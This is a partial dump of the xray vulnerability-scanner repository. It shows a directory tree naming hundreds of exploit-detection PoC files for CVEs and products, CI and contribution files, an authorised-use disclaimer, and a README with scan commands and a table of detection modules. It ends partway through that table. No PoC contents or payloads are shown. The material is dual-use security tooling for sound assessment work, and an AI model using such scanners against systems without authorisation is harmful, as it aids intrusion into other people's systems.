Repository: chaitin/xray
Branch: master
Commit: aee9f9cecc3d
Files: 460
Total size: 2.7 MB
Directory structure:
gitextract_qmut0ion/
├── .gitattributes
├── .github/
│ ├── PULL_REQUEST_TEMPLATE.md
│ └── workflows/
│ └── check_poc.yml
├── .gitignore
├── Disclaimer.md
├── LICENSE.md
├── README.md
├── README_EN.md
├── docs/
│ ├── .nojekyll
│ └── index.html
├── fingerprints/
│ └── tcp-openbsd-openssh.yml
├── pocs/
│ ├── 74cms-sqli-1.yml
│ ├── 74cms-sqli-2.yml
│ ├── 74cms-sqli.yml
│ ├── activemq-cve-2016-3088.yml
│ ├── activemq-default-password.yml
│ ├── airflow-unauth.yml
│ ├── alibaba-canal-default-password.yml
│ ├── alibaba-canal-info-leak.yml
│ ├── alibaba-nacos-v1-auth-bypass.yml
│ ├── amtt-hiboss-server-ping-rce.yml
│ ├── apache-ambari-default-password.yml
│ ├── apache-druid-cve-2021-36749.yml
│ ├── apache-flink-upload-rce.yml
│ ├── apache-httpd-cve-2021-40438-ssrf.yml
│ ├── apache-httpd-cve-2021-41773-path-traversal.yml
│ ├── apache-httpd-cve-2021-41773-rce.yml
│ ├── apache-kylin-unauth-cve-2020-13937.yml
│ ├── apache-nifi-api-unauthorized-access.yml
│ ├── apache-ofbiz-cve-2018-8033-xxe.yml
│ ├── apache-ofbiz-cve-2020-9496-xml-deserialization.yml
│ ├── apache-storm-unauthorized-access.yml
│ ├── aspcms-backend-leak.yml
│ ├── bash-cve-2014-6271.yml
│ ├── bt742-pma-unauthorized-access.yml
│ ├── cacti-weathermap-file-write.yml
│ ├── chinaunicom-modem-default-password.yml
│ ├── cisco-cve-2020-3452-readfile.yml
│ ├── citrix-cve-2019-19781-path-traversal.yml
│ ├── citrix-cve-2020-8191-xss.yml
│ ├── citrix-cve-2020-8193-unauthorized.yml
│ ├── citrix-xenmobile-cve-2020-8209.yml
│ ├── coldfusion-cve-2010-2861-lfi.yml
│ ├── confluence-cve-2015-8399.yml
│ ├── confluence-cve-2019-3396-lfi.yml
│ ├── confluence-cve-2021-26084.yml
│ ├── confluence-cve-2021-26085-arbitrary-file-read.yml
│ ├── consul-rexec-rce.yml
│ ├── consul-service-rce.yml
│ ├── coremail-cnvd-2019-16798.yml
│ ├── couchcms-cve-2018-7662.yml
│ ├── couchdb-cve-2017-12635.yml
│ ├── couchdb-unauth.yml
│ ├── craftcms-seomatic-cve-2020-9757-rce.yml
│ ├── dahua-cve-2021-33044-authentication-bypass.yml
│ ├── datang-ac-default-password-cnvd-2021-04128.yml
│ ├── dedecms-carbuyaction-fileinclude.yml
│ ├── dedecms-cve-2018-6910.yml
│ ├── dedecms-cve-2018-7700-rce.yml
│ ├── dedecms-guestbook-sqli.yml
│ ├── dedecms-membergroup-sqli.yml
│ ├── dedecms-url-redirection.yml
│ ├── discuz-ml3x-cnvd-2019-22239.yml
│ ├── discuz-v72-sqli.yml
│ ├── discuz-wechat-plugins-unauth.yml
│ ├── discuz-wooyun-2010-080723.yml
│ ├── dlink-850l-info-leak.yml
│ ├── dlink-cve-2019-16920-rce.yml
│ ├── dlink-cve-2019-17506.yml
│ ├── dlink-cve-2020-25078-account-disclosure.yml
│ ├── dlink-cve-2020-9376-dump-credentials.yml
│ ├── dlink-dsl-2888a-rce.yml
│ ├── docker-api-unauthorized-rce.yml
│ ├── docker-registry-api-unauth.yml
│ ├── dotnetcms-sqli.yml
│ ├── draytek-cve-2020-8515.yml
│ ├── druid-monitor-unauth.yml
│ ├── drupal-cve-2014-3704-sqli.yml
│ ├── drupal-cve-2018-7600-rce.yml
│ ├── drupal-cve-2019-6340.yml
│ ├── dubbo-admin-default-password.yml
│ ├── duomicms-sqli.yml
│ ├── dvr-cve-2018-9995.yml
│ ├── e-zkeco-cnvd-2020-57264-read-file.yml
│ ├── ecology-arbitrary-file-upload.yml
│ ├── ecology-filedownload-directory-traversal.yml
│ ├── ecology-javabeanshell-rce.yml
│ ├── ecology-springframework-directory-traversal.yml
│ ├── ecology-syncuserinfo-sqli.yml
│ ├── ecology-v8-sqli.yml
│ ├── ecology-validate-sqli.yml
│ ├── ecology-workflowcentertreedata-sqli.yml
│ ├── ecshop-cnvd-2020-58823-sqli.yml
│ ├── ecshop-collection-list-sqli.yml
│ ├── ecshop-rce.yml
│ ├── eea-info-leak-cnvd-2021-10543.yml
│ ├── elasticsearch-cve-2014-3120.yml
│ ├── elasticsearch-cve-2015-1427.yml
│ ├── elasticsearch-cve-2015-3337-lfi.yml
│ ├── elasticsearch-cve-2015-5531.yml
│ ├── elasticsearch-unauth.yml
│ ├── etcd-unauth.yml
│ ├── etouch-v2-sqli.yml
│ ├── exchange-cve-2021-26855-ssrf.yml
│ ├── exchange-cve-2021-41349-xss.yml
│ ├── f5-cve-2021-22986.yml
│ ├── f5-tmui-cve-2020-5902-rce.yml
│ ├── fangweicms-sqli.yml
│ ├── feifeicms-lfr.yml
│ ├── finecms-sqli.yml
│ ├── finereport-directory-traversal.yml
│ ├── flexpaper-cve-2018-11686.yml
│ ├── flink-jobmanager-cve-2020-17519-lfi.yml
│ ├── fortigate-cve-2018-13379-readfile.yml
│ ├── frp-dashboard-unauth.yml
│ ├── gateone-cve-2020-35736.yml
│ ├── gilacms-cve-2020-5515.yml
│ ├── gitlab-graphql-info-leak-cve-2020-26413.yml
│ ├── gitlab-ssrf-cve-2021-22214.yml
│ ├── gitlist-rce-cve-2018-1000533.yml
│ ├── glassfish-cve-2017-1000028-lfi.yml
│ ├── go-pprof-leak.yml
│ ├── gocd-cve-2021-43287.yml
│ ├── grafana-default-password.yml
│ ├── h2-database-web-console-unauthorized-access.yml
│ ├── h3c-imc-rce.yml
│ ├── h3c-secparh-any-user-login.yml
│ ├── h5s-video-platform-cnvd-2020-67113-unauth.yml
│ ├── hadoop-yarn-unauth.yml
│ ├── hanming-video-conferencing-file-read.yml
│ ├── harbor-cve-2019-16097.yml
│ ├── hikvision-cve-2017-7921.yml
│ ├── hikvision-info-leak.yml
│ ├── hikvision-intercom-service-default-password.yml
│ ├── hikvision-unauthenticated-rce-cve-2021-36260.yml
│ ├── hjtcloud-arbitrary-fileread.yml
│ ├── hjtcloud-directory-file-leak.yml
│ ├── huawei-home-gateway-hg659-fileread.yml
│ ├── ifw8-router-cve-2019-16313.yml
│ ├── iis-put-getshell.yml
│ ├── influxdb-unauth.yml
│ ├── inspur-tscev4-cve-2020-21224-rce.yml
│ ├── jboss-cve-2010-1871.yml
│ ├── jboss-unauth.yml
│ ├── jeewms-showordownbyurl-fileread.yml
│ ├── jellyfin-cve-2021-29490.yml
│ ├── jellyfin-file-read-cve-2021-21402.yml
│ ├── jenkins-cve-2018-1000600.yml
│ ├── jenkins-cve-2018-1000861-rce.yml
│ ├── jenkins-unauthorized-access.yml
│ ├── jetty-cve-2021-28164.yml
│ ├── jinher-oa-c6-default-password.yml
│ ├── jira-cve-2019-11581.yml
│ ├── jira-cve-2019-8442.yml
│ ├── jira-cve-2019-8449.yml
│ ├── jira-cve-2020-14179.yml
│ ├── jira-cve-2020-14181.yml
│ ├── jira-ssrf-cve-2019-8451.yml
│ ├── joomla-cnvd-2019-34135-rce.yml
│ ├── joomla-component-vreview-sql.yml
│ ├── joomla-cve-2015-7297-sqli.yml
│ ├── joomla-cve-2017-8917-sqli.yml
│ ├── joomla-cve-2018-7314-sql.yml
│ ├── joomla-ext-zhbaidumap-cve-2018-6605-sqli.yml
│ ├── jumpserver-unauth-rce.yml
│ ├── jupyter-notebook-unauthorized-access.yml
│ ├── kafka-manager-unauth.yml
│ ├── kibana-cve-2018-17246.yml
│ ├── kibana-unauth.yml
│ ├── kingdee-eas-directory-traversal.yml
│ ├── kingsoft-v8-default-password.yml
│ ├── kingsoft-v8-file-read.yml
│ ├── kong-cve-2020-11710-unauth.yml
│ ├── kubernetes-unauth.yml
│ ├── kyan-network-monitoring-account-password-leakage.yml
│ ├── landray-oa-custom-jsp-fileread.yml
│ ├── lanproxy-cve-2021-3019-lfi.yml
│ ├── laravel-cve-2021-3129.yml
│ ├── laravel-debug-info-leak.yml
│ ├── laravel-improper-webdir.yml
│ ├── maccms-rce.yml
│ ├── maccmsv10-backdoor.yml
│ ├── metinfo-cve-2019-16996-sqli.yml
│ ├── metinfo-cve-2019-16997-sqli.yml
│ ├── metinfo-cve-2019-17418-sqli.yml
│ ├── metinfo-file-read.yml
│ ├── metinfo-lfi-cnvd-2018-13393.yml
│ ├── minio-default-password.yml
│ ├── mongo-express-cve-2019-10758.yml
│ ├── mpsec-isg1000-file-read.yml
│ ├── msvod-sqli.yml
│ ├── myucms-lfr.yml
│ ├── nagio-cve-2018-10735.yml
│ ├── nagio-cve-2018-10736.yml
│ ├── nagio-cve-2018-10737.yml
│ ├── nagio-cve-2018-10738.yml
│ ├── natshell-arbitrary-file-read.yml
│ ├── netentsec-icg-default-password.yml
│ ├── netentsec-ngfw-rce.yml
│ ├── netgear-cve-2017-5521.yml
│ ├── nextjs-cve-2017-16877.yml
│ ├── nexus-cve-2019-7238.yml
│ ├── nexus-cve-2020-10199.yml
│ ├── nexus-cve-2020-10204.yml
│ ├── nexus-default-password.yml
│ ├── nexusdb-cve-2020-24571-path-traversal.yml
│ ├── nhttpd-cve-2019-16278.yml
│ ├── node-red-dashboard-file-read-cve-2021-3223.yml
│ ├── novnc-url-redirection-cve-2021-3654.yml
│ ├── nps-default-password.yml
│ ├── ns-asg-file-read.yml
│ ├── nsfocus-uts-password-leak.yml
│ ├── nuuo-file-inclusion.yml
│ ├── odoo-file-read.yml
│ ├── openfire-cve-2019-18394-ssrf.yml
│ ├── opentsdb-cve-2020-35476-rce.yml
│ ├── panabit-gateway-default-password.yml
│ ├── panabit-ixcache-default-password.yml
│ ├── pandorafms-cve-2019-20224-rce.yml
│ ├── pbootcms-database-file-download.yml
│ ├── pentaho-cve-2021-31602-authentication-bypass.yml
│ ├── php-cgi-cve-2012-1823.yml
│ ├── phpcms-cve-2018-19127.yml
│ ├── phpmyadmin-cve-2018-12613-file-inclusion.yml
│ ├── phpmyadmin-setup-deserialization.yml
│ ├── phpok-sqli.yml
│ ├── phpshe-sqli.yml
│ ├── phpstudy-backdoor-rce.yml
│ ├── phpstudy-nginx-wrong-resolve.yml
│ ├── phpunit-cve-2017-9841-rce.yml
│ ├── powercreator-arbitrary-file-upload.yml
│ ├── prometheus-url-redirection-cve-2021-29622.yml
│ ├── pulse-cve-2019-11510.yml
│ ├── pyspider-unauthorized-access.yml
│ ├── qibocms-sqli.yml
│ ├── qilin-bastion-host-rce.yml
│ ├── qizhi-fortressaircraft-unauthorized.yml
│ ├── qnap-cve-2019-7192.yml
│ ├── rabbitmq-default-password.yml
│ ├── rails-cve-2018-3760-rce.yml
│ ├── razor-cve-2018-8770.yml
│ ├── rconfig-cve-2019-16663.yml
│ ├── resin-cnnvd-200705-315.yml
│ ├── resin-inputfile-fileread-or-ssrf.yml
│ ├── resin-viewfile-fileread.yml
│ ├── rockmongo-default-password.yml
│ ├── ruijie-eg-cli-rce.yml
│ ├── ruijie-eg-file-read.yml
│ ├── ruijie-eg-info-leak.yml
│ ├── ruijie-eweb-rce-cnvd-2021-09650.yml
│ ├── ruijie-nbr1300g-cli-password-leak.yml
│ ├── ruijie-uac-cnvd-2021-14536.yml
│ ├── ruoyi-management-fileread.yml
│ ├── saltstack-cve-2020-16846.yml
│ ├── saltstack-cve-2021-25282-file-write.yml
│ ├── samsung-wea453e-default-pwd.yml
│ ├── samsung-wea453e-rce.yml
│ ├── samsung-wlan-ap-wea453e-rce.yml
│ ├── sangfor-ba-rce.yml
│ ├── sangfor-edr-arbitrary-admin-login.yml
│ ├── sangfor-edr-cssp-rce.yml
│ ├── sangfor-edr-tool-rce.yml
│ ├── satellian-cve-2020-7980-rce.yml
│ ├── seacms-before-v992-rce.yml
│ ├── seacms-rce.yml
│ ├── seacms-sqli.yml
│ ├── seacms-v654-rce.yml
│ ├── seacmsv645-command-exec.yml
│ ├── secnet-ac-default-password.yml
│ ├── seeyon-a6-employee-info-leak.yml
│ ├── seeyon-ajax-unauthorized-access.yml
│ ├── seeyon-cnvd-2020-62422-readfile.yml
│ ├── seeyon-oa-cookie-leak.yml
│ ├── seeyon-session-leak.yml
│ ├── seeyon-wooyun-2015-0108235-sqli.yml
│ ├── seeyon-wooyun-2015-148227.yml
│ ├── shiziyu-cms-apicontroller-sqli.yml
│ ├── shopxo-cnvd-2021-15822.yml
│ ├── showdoc-default-password.yml
│ ├── showdoc-uploadfile.yml
│ ├── skywalking-cve-2020-9483-sqli.yml
│ ├── solarwinds-cve-2020-10148.yml
│ ├── solr-cve-2017-12629-xxe.yml
│ ├── solr-cve-2019-0193.yml
│ ├── solr-fileread.yml
│ ├── solr-velocity-template-rce.yml
│ ├── sonarqube-cve-2020-27986-unauth.yml
│ ├── sonicwall-ssl-vpn-rce.yml
│ ├── spark-api-unauth.yml
│ ├── spark-webui-unauth.yml
│ ├── spon-ip-intercom-file-read.yml
│ ├── spon-ip-intercom-ping-rce.yml
│ ├── spring-cloud-cve-2020-5405.yml
│ ├── spring-cloud-cve-2020-5410.yml
│ ├── spring-cve-2016-4977.yml
│ ├── springboot-env-unauth.yml
│ ├── springcloud-cve-2019-3799.yml
│ ├── supervisord-cve-2017-11610.yml
│ ├── tamronos-iptv-rce.yml
│ ├── telecom-gateway-default-password.yml
│ ├── tensorboard-unauth.yml
│ ├── terramaster-cve-2020-15568.yml
│ ├── terramaster-tos-rce-cve-2020-28188.yml
│ ├── thinkadmin-v6-readfile.yml
│ ├── thinkcmf-lfi.yml
│ ├── thinkcmf-write-shell.yml
│ ├── thinkphp-v6-file-write.yml
│ ├── thinkphp5-controller-rce.yml
│ ├── thinkphp5023-method-rce.yml
│ ├── tianqing-info-leak.yml
│ ├── tomcat-cve-2017-12615-rce.yml
│ ├── tomcat-cve-2018-11759.yml
│ ├── tongda-meeting-unauthorized-access.yml
│ ├── tongda-user-session-disclosure.yml
│ ├── tpshop-directory-traversal.yml
│ ├── tpshop-sqli.yml
│ ├── tvt-nvms-1000-file-read-cve-2019-20085.yml
│ ├── typecho-rce.yml
│ ├── ueditor-cnvd-2017-20077-file-upload.yml
│ ├── uwsgi-cve-2018-7490.yml
│ ├── vbulletin-cve-2019-16759-bypass.yml
│ ├── vbulletin-cve-2019-16759.yml
│ ├── vmware-vcenter-arbitrary-file-read.yml
│ ├── vmware-vcenter-cve-2021-21985-rce.yml
│ ├── vmware-vcenter-unauthorized-rce-cve-2021-21972.yml
│ ├── vmware-vrealize-cve-2021-21975-ssrf.yml
│ ├── weaver-ebridge-file-read.yml
│ ├── weblogic-cve-2017-10271.yml
│ ├── weblogic-cve-2019-2725.yml
│ ├── weblogic-cve-2019-2729-1.yml
│ ├── weblogic-cve-2019-2729-2.yml
│ ├── weblogic-cve-2020-14750.yml
│ ├── weblogic-ssrf.yml
│ ├── webmin-cve-2019-15107-rce.yml
│ ├── weiphp-path-traversal.yml
│ ├── weiphp-sql.yml
│ ├── wifisky-default-password-cnvd-2021-39012.yml
│ ├── wordpress-cve-2019-19985-infoleak.yml
│ ├── wordpress-ext-adaptive-images-lfi.yml
│ ├── wordpress-ext-mailpress-rce.yml
│ ├── wuzhicms-v410-sqli.yml
│ ├── xdcms-sql.yml
│ ├── xiuno-bbs-cvnd-2019-01348-reinstallation.yml
│ ├── xunchi-cnvd-2020-23735-file-read.yml
│ ├── yapi-rce.yml
│ ├── yccms-rce.yml
│ ├── yongyou-u8-oa-sqli.yml
│ ├── yonyou-grp-u8-sqli-to-rce.yml
│ ├── yonyou-grp-u8-sqli.yml
│ ├── yonyou-nc-arbitrary-file-upload.yml
│ ├── yonyou-nc-bsh-servlet-bshservlet-rce.yml
│ ├── youphptube-encoder-cve-2019-5127.yml
│ ├── youphptube-encoder-cve-2019-5128.yml
│ ├── youphptube-encoder-cve-2019-5129.yml
│ ├── yungoucms-sqli.yml
│ ├── zabbix-authentication-bypass.yml
│ ├── zabbix-cve-2016-10134-sqli.yml
│ ├── zabbix-default-password.yml
│ ├── zcms-v3-sqli.yml
│ ├── zeit-nodejs-cve-2020-5284-directory-traversal.yml
│ ├── zeroshell-cve-2019-12725-rce.yml
│ ├── zimbra-cve-2019-9670-xxe.yml
│ └── zzcms-zsmanage-sqli.yml
├── report/
│ ├── .browserslistrc
│ ├── .editorconfig
│ ├── .eslintrc.js
│ ├── .gitignore
│ ├── README.md
│ ├── babel.config.js
│ ├── package.json
│ ├── public/
│ │ └── index.html
│ ├── src/
│ │ ├── App.vue
│ │ ├── assets/
│ │ │ └── .gitkeep
│ │ ├── components/
│ │ │ ├── ServiceVulnerability.vue
│ │ │ ├── Subdomain.vue
│ │ │ └── WebVulnerability.vue
│ │ ├── icons.js
│ │ ├── main.js
│ │ └── views/
│ │ └── Home.vue
│ ├── vue.config.js
│ └── webstorm.config.js
├── tests/
│ ├── .gitkeep
│ ├── README.md
│ ├── evilpot/
│ │ ├── README.md
│ │ ├── build.ps1
│ │ ├── build.sh
│ │ ├── evil/
│ │ │ ├── echo.go
│ │ │ ├── evil.go
│ │ │ └── util.go
│ │ ├── go.mod
│ │ ├── go.sum
│ │ └── main.go
│ └── vulstudy/
│ ├── BodgeIt/
│ │ ├── Dockerfile
│ │ ├── README.md
│ │ └── docker-compose.yml
│ ├── DSVW/
│ │ ├── Dockerfile
│ │ ├── README.md
│ │ └── docker-compose.yml
│ ├── DVWA/
│ │ ├── Dockerfile
│ │ ├── README.md
│ │ ├── docker-compose.yml
│ │ ├── php.ini
│ │ └── run.sh
│ ├── Hackademic/
│ │ ├── Dockerfile
│ │ ├── README.md
│ │ └── docker-compose.yml
│ ├── MCIR/
│ │ ├── Dockerfile
│ │ ├── README.md
│ │ └── docker-compose.yml
│ ├── README.md
│ ├── WackoPicko/
│ │ ├── Dockerfile
│ │ ├── README.md
│ │ └── docker-compose.yml
│ ├── WebGoat/
│ │ ├── README.md
│ │ ├── docker-compose.yml
│ │ ├── webgoat-server/
│ │ │ ├── Dockerfile
│ │ │ └── start.sh
│ │ └── webwolf/
│ │ ├── Dockerfile
│ │ └── start.sh
│ ├── XSSed/
│ │ ├── Dockerfile
│ │ ├── README.md
│ │ ├── docker-compose.yml
│ │ └── docker-php.conf
│ ├── bWAPP/
│ │ ├── Dockerfile
│ │ ├── README.md
│ │ └── docker-compose.yml
│ ├── doc/
│ │ └── README.md
│ ├── docker-compose.yml
│ ├── mutillidae/
│ │ ├── Dockerfile
│ │ ├── README.md
│ │ └── docker-compose.yml
│ ├── sqli-labs/
│ │ ├── Dockerfile
│ │ ├── README.md
│ │ └── docker-compose.yml
│ ├── vulnerable-node/
│ │ ├── Dockerfile
│ │ ├── README.md
│ │ ├── docker-compose.yml
│ │ └── postgresql/
│ │ ├── Dockerfile
│ │ └── init.sql
│ └── www/
│ ├── Dockerfile
│ ├── README.md
│ ├── index.css
│ └── index.html
└── webhook/
├── README.md
├── app.py
├── config.py
├── config.yml
├── executor/
│ ├── __init__.py
│ ├── executor.py
│ └── registry.py
├── model/
│ ├── __init__.py
│ ├── config.py
│ ├── plugin.py
│ └── vuln.py
├── plugins/
│ ├── __init__.py
│ ├── base.py
│ └── demo.py
├── requirements.txt
└── views/
├── __init__.py
└── views.py
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitattributes
================================================
*.py linguist-language=Go
================================================
FILE: .github/PULL_REQUEST_TEMPLATE.md
================================================
**请先认真阅读下列要求,如不符合会被直接关闭 PR**
- 确保当前 POC 与已有的 POC 没有重复,除了仓库 `pocs` 目录中的,还有内置的几个用 Go 写的 POC也不要重复:
```
poc-go-php-cve-2019-11043-rce
poc-go-seeyon-htmlofficeservlet-rce
poc-go-tongda-lfi-upload-rce
poc-go-tongda-arbitrary-auth
poc-go-ecology-dbconfig-info-leak
poc-go-tomcat-put
poc-go-tomcat-cve-2020-1938
```
- 阅读规范和要求
- https://docs.xray.cool/#/guide/contribute
- https://docs.xray.cool/#/guide/high_quality_poc
- 一个 pull request 只提交一个 poc
- 对于 0day / 1 day 等未大面积公开细节的漏洞请勿提交,可以私聊群管理员
- 不接受没有测试环境的 poc,测试环境可以使用 [vulhub](https://github.com/vulhub/vulhub/) 或 [vulnapps](https://github.com/Medicean/VulApps),也可以提供 fofa/zoomeye/shodan 等搜索关键字。 请勿直接填写公网上未修复的站点的地址,如果有特殊情况,请私聊群内管理解决。
- 如果你的 poc 被合并或者没有合并但是评论说需要发送奖励,请查看 https://docs.xray.cool/#/guide/feedback 并添加最下面的微信,说明你的 poc 地址,方便发送奖励。
**我是分割线,在提交 poc 填写说明的时候,请务必阅读上方要求,然后删除本分割线和上方的内容,只保留下面自定义的部分即可,否则不予通过。**
----------
## 本 poc 是检测什么漏洞的
## 测试环境
## 备注
================================================
FILE: .github/workflows/check_poc.yml
================================================
name: Check POC
on: [push, pull_request]
jobs:
check_poc:
runs-on: ubuntu-18.04
steps:
- uses: actions/setup-python@v1
with:
python-version: 3.7
- uses: actions/checkout@v2
with:
fetch-depth: 1
- name: Prepare
run: |
cd $GITHUB_WORKSPACE && \
wget -nv https://github.com/chaitin/xray/releases/download/1.8.2/xray_linux_amd64.zip && \
pip3 install yamllint && \
unzip xray_linux_amd64.zip && \
echo 'update:
check: false' > config.yaml
- name: Check POC
run: |
cd $GITHUB_WORKSPACE && \
./xray_linux_amd64 poclint --script "./pocs/*" --filepath "./pocs/" --rules filename,filepath,yamlschema,yamllint,cellint && \
./xray_linux_amd64 poclint --script "./fingerprints/*" --filepath "./fingerprints/" --rules filename,filepath,yamlschema,yamllint,cellint
================================================
FILE: .gitignore
================================================
# Created by .ignore support plugin (hsz.mobi)
### Python template
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
*$py.class
# C extensions
*.so
# Distribution / packaging
.Python
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
wheels/
pip-wheel-metadata/
share/python-wheels/
*.egg-info/
.installed.cfg
*.egg
MANIFEST
# PyInstaller
# Usually these files are written by a python script from a template
# before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec
# Installer logs
pip-log.txt
pip-delete-this-directory.txt
# Unit test / coverage reports
htmlcov/
.tox/
.nox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*.cover
.hypothesis/
.pytest_cache/
# Translations
*.mo
*.pot
# Django stuff:
*.log
local_settings.py
db.sqlite3
# Flask stuff:
instance/
.webassets-cache
# Scrapy stuff:
.scrapy
# Sphinx documentation
docs/_build/
# PyBuilder
target/
# Jupyter Notebook
.ipynb_checkpoints
# IPython
profile_default/
ipython_config.py
# pyenv
.python-version
# pipenv
# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
# However, in case of collaboration, if having platform-specific dependencies or dependencies
# having no cross-platform support, pipenv may install dependencies that don't work, or not
# install all needed dependencies.
#Pipfile.lock
# celery beat schedule file
celerybeat-schedule
# SageMath parsed files
*.sage.py
# Environments
.env
.venv
env/
venv/
ENV/
env.bak/
venv.bak/
# Spyder project settings
.spyderproject
.spyproject
# Rope project settings
.ropeproject
# mkdocs documentation
/site
# mypy
.mypy_cache/
.dmypy.json
dmypy.json
# Pyre type checker
.pyre/
.idea
.DS_Store
================================================
FILE: Disclaimer.md
================================================
## 免责声明
本工具仅面向**合法授权**的企业安全建设行为,如您需要测试本工具的可用性,请自行搭建靶机环境。
在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。**请勿对非授权目标进行扫描。**
如果您获得了本软件社区高级版等版本的 License,该 License 下的权益仅限您个人使用,**禁止以任何形式复制、分发、传播该 License。**
禁止对本软件实施逆向工程、反编译、试图破译源代码等行为。
**如果发现上述禁止行为,我们将保留追究您法律责任的权利。**
如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。
在安装并使用本工具前,请您**务必审慎阅读、充分理解各条款内容**,限制、免责条款或者其他涉及您重大权益的条款可能会以加粗、加下划线等形式提示您重点注意。
除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要安装并使用本工具。您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。
## Disclaimer
This tool is only for **legally authorized** enterprise security construction behavior, if you need to test the usability of this tool, please build your own target environment.
When using this tool for testing, you should ensure that the behavior complies with local laws and regulations and that sufficient authorization has been obtained. **Do not scan unauthorized targets.**
If you have obtained the License of the software Community Premium Edition and other versions, the rights and interests under the License are for your personal use only. **Reproduction, distribution and dissemination of the License in any form are prohibited.**
It is forbidden to reverse engineer, decompile, and attempt to decipher the source code of the software.
**We reserve the right to hold you legally liable if we find the above prohibited behavior.**
If you have any illegal behavior in the process of using this tool, you need to bear the corresponding consequences by yourself, and we will not bear any legal and joint liability.
Before installing and using the tool, please **be sure to carefully read and fully understand the content of the terms**. Limitations, disclaimers or other terms involving your significant rights and interests may be in bold, underlined and other forms to remind you to pay attention.
Please do not install and use this tool unless you have fully read, fully understand and accept all the terms of this Agreement. Your use of this Agreement or your acceptance of this Agreement by any other express or implied means shall be deemed that you have read and agreed to be bound by this Agreement.
================================================
FILE: LICENSE.md
================================================
在符合以下条件的情况下,我们欢迎任何人以任何形式使用本项目(包括商用)。
- 注明集成了本项目(注明方式: 在项目介绍页附上本项目 repo 地址)
- 同意 https://github.com/chaitin/xray/blob/master/Disclaimer.md 免责声明
Anyone is welcome to use this program in any form provided the following conditions are met (Including commercial).
- Indicate the integration of the project (indicate: attach the repo address of the project on the project introduction page)
- Agree to https://github.com/chaitin/xray/blob/master/Disclaimer.md disclaimer
================================================
FILE: README.md
================================================
Welcome to xray 👋
一款功能强大的安全评估工具
🏠使用文档 •
⬇️xray下载 •
⬇️xpoc下载 •
⬇️xapp下载 •
📖插件存储库
[**English Version**](./README_EN.md)
> 注意:xray系列不开源,直接下载构建的二进制文件即可,仓库内主要为社区贡献的 poc,每次 xray 发布将自动打包。
## ✨ xray2.0
为了解决 xray 1.0在功能增加过程中变得复杂且臃肿的问题,我们推出了 xray 2.0。
这一全新版本致力于提升功能使用的流畅度,降低使用门槛,并帮助更多安全行业从业者以更高效的模式收获更好的体验。xray 2.0 将整合一系列新的安全工具,形成一个全面的安全工具集。
**xray2.0系列的第二款工具xapp已经上线,欢迎体验!**
### XPOC
xpoc是xray2.0系列的第一款工具,它是一款为供应链漏洞扫描设计的快速应急响应工具
项目地址:https://github.com/chaitin/xpoc
### XAPP
xapp是一款专注于web指纹识别的工具。你可以使用xapp对web目标所使用的技术进行识别,为安全测试做好准备。
项目地址:https://github.com/chaitin/xapp
### 插件存储库
我们为各类插件创建了一个专门的存储库,旨在方便大家共享和使用各种插件。
这里主要收录的是开源的、转化成 xray格式的脚本,以供大家使用。
我们会不定期地往这里推送一些新的插件,同时也希望大家能积极踊跃的优化或者提交插件,共同丰富这个仓库。
项目地址:https://github.com/chaitin/xray-plugins
## 🚀 快速使用
**在使用之前,请务必阅读并同意 [License](https://github.com/chaitin/xray/blob/master/LICENSE.md) 文件中的条款,否则请勿安装使用本工具。**
1. 使用基础爬虫爬取并对爬虫爬取的链接进行漏洞扫描
```bash
xray webscan --basic-crawler http://example.com --html-output vuln.html
```
2. 使用 HTTP 代理进行被动扫描
```bash
xray webscan --listen 127.0.0.1:7777 --html-output proxy.html
```
设置浏览器 http 代理为 `http://127.0.0.1:7777`,就可以自动分析代理流量并扫描。
>如需扫描 https 流量,请阅读下方文档 `抓取 https 流量` 部分
3. 只扫描单个 url,不使用爬虫
```bash
xray webscan --url http://example.com/?a=b --html-output single-url.html
```
4. 手动指定本次运行的插件
默认情况下,将会启用所有内置插件,可以使用下列命令指定本次扫描启用的插件。
```bash
xray webscan --plugins cmd-injection,sqldet --url http://example.com
xray webscan --plugins cmd-injection,sqldet --listen 127.0.0.1:7777
```
5. 指定插件输出
可以指定将本次扫描的漏洞信息输出到某个文件中:
```bash
xray webscan --url http://example.com/?a=b \
--text-output result.txt --json-output result.json --html-output report.html
```
[报告样例](https://docs.xray.cool/assets/report_example.html)
其他用法请阅读文档: https://docs.xray.cool
## 🪟 检测模块
新的检测模块将不断添加
| 名称 | Key | 版本 | 说明 |
|----------------|------------------|-----|---------------------------------------------------------------------------------|
| XSS漏洞检测 | `xss` | 社区版 | 利用语义分析的方式检测XSS漏洞 |
| SQL 注入检测 | `sqldet` | 社区版 | 支持报错注入、布尔注入和时间盲注等 |
| 命令/代码注入检测 | `cmd-injection` | 社区版 | 支持 shell 命令注入、PHP 代码执行、模板注入等 |
| 目录枚举 | `dirscan` | 社区版 | 检测备份文件、临时文件、debug 页面、配置文件等10余类敏感路径和文件 |
| 路径穿越检测 | `path-traversal` | 社区版 | 支持常见平台和编码 |
| XML 实体注入检测 | `xxe` | 社区版 | 支持有回显和反连平台检测 |
| poc 管理 | `phantasm` | 社区版 | 默认内置部分常用的 poc,用户可以根据需要自行构建 poc 并运行。文档:[POC](https://docs.xray.cool/#/guide/poc) |
| 文件上传检测 | `upload` | 社区版 | 支持常见的后端语言 |
| 弱口令检测 | `brute-force` | 社区版 | 社区版支持检测 HTTP 基础认证和简易表单弱口令,内置常见用户名和密码字典 |
| jsonp 检测 | `jsonp` | 社区版 | 检测包含敏感信息可以被跨域读取的 jsonp 接口 |
| ssrf 检测 | `ssrf` | 社区版 | ssrf 检测模块,支持常见的绕过技术和反连平台检测 |
| 基线检查 | `baseline` | 社区版 | 检测低 SSL 版本、缺失的或错误添加的 http 头等 |
| 任意跳转检测 | `redirect` | 社区版 | 支持 HTML meta 跳转、30x 跳转等 |
| CRLF 注入 | `crlf-injection` | 社区版 | 检测 HTTP 头注入,支持 query、body 等位置的参数 |
